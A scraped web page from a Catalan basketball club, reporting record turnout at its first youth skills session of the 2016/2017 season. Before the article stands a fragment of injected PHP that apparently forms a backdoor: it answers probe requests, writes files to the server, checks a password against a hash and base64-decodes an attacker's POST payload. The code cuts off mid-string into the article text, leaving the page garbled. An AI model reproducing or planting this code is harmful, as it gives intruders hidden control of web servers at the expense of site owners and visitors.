function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Rècord de participants en la primera sessió de tecnificació d'alevins de la temporada 2016/2017 - Tgn Bàsquet Club -

Rècord de participants en la primera sessió de tecnificació d’alevins de la temporada 2016/2017

By
Updated: desembre 23, 2016

Diumenge passat es va fer la primera sessió de tecnificació d’alevins de la temporada. Com s’ha vingut fent en campanyes anteriors, aquestes tecnificacions serveixen per treballar aspectes específics del joc que sovint durant els entrenaments de la temporada no es poden practicar a fons. Així, en aquesta primera sessió també es va voler obrir l’entrenament a tots aquells jugadors que no fossin del club i l’experiència va ser molt satisfactòria. Un total de 50 jugadors van participar en la jornada, 15 dels quals d’altres entitats. «Estem molt contents. La gent ha respost molt bé i ja veus quina quantitat de nens i nenes tenim aquí. Avui treballem el bot i les finalitzacions i la predisposició de tothom ha estat molt bona», va dir Pau Robert, principal responsable de la tecnificació.

El TGN Bàsquet va posar a disposició dels jugadors una gran quantitat dels seus entrenadors perquè personalitzessin al màxim l’entrenament i així poder treure’n tot el suc.

 

GALERIA DE FOTOS

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *